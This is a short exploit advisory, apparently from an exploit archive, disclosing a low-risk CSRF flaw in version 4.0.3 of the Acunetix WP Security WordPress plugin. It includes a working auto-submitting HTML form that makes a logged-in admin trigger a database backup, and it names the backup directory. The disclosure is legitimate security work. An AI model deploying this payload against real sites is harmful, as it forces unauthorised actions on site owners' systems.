Wordpress Plugin Acunetix WP Security Make Backup CSRF

Risk: Low
Local: No
Remote: Yes
CWE: CWE-352

################################################################################################################################### # Exploit Title: Wordpress Plugin - Acunetix WP Security Make Backup CSRF # Date: 2014 11 Fabruary # Exploit Author: Yashar shahinzadeh # Special thanks to Mormoroth # Credit goes for: http://y-shahinzadeh.ir & ha.cker.ir # Vendor Homepage: http://wordpress.org/plugins/wp-security-scan/ # Tested on: Linux & Windows, PHP 5.3.2 # Affected Version : 4.0.3 (Last) # # Contacts: { http://Twitter.com/YShahinzadeh , http://y-shahinzadeh.ir , http://Twitter.com/Mormoroth , http://mormoroth.ir } ################################################################################################################################### Summary: ======== 1. CSRF / Get Backup 2. Further Information 1. CSRF / Get Backup: ===================== The Acunetix WP Security Suffers from CSRF attack, getting backup of wordpress database and saving it in backup folder. Although it has a good random generator function producing none-guessable numeric values, it still is a vulnerability which can be used against wordpress in a complex attack scenario. Here is a simple exploit: <html> <body onload="submitForm()"> <form name="myForm" id="myForm" action="http://localhost/wordpress-3.8/wp-admin/admin.php?page=wps_database" method="post"> <input type="hidden" name="wsd_db_backup" value=""> <input type="hidden" name="backupDatabaseButton" value="Backup+now%21"> </form> <script type='text/javascript'>document.myForm.submit();</script> </html> Backup files are stored in /wp-content/plugins/wp-security-scan/res/backups/ directory. It's protected with an index, though. 2. Further Information: ======================= Further analysis about backup function and attacking against it can be found at my blog, http://blog.y-shahinzadeh.ir /** Yasshar Shahinzadeh **/

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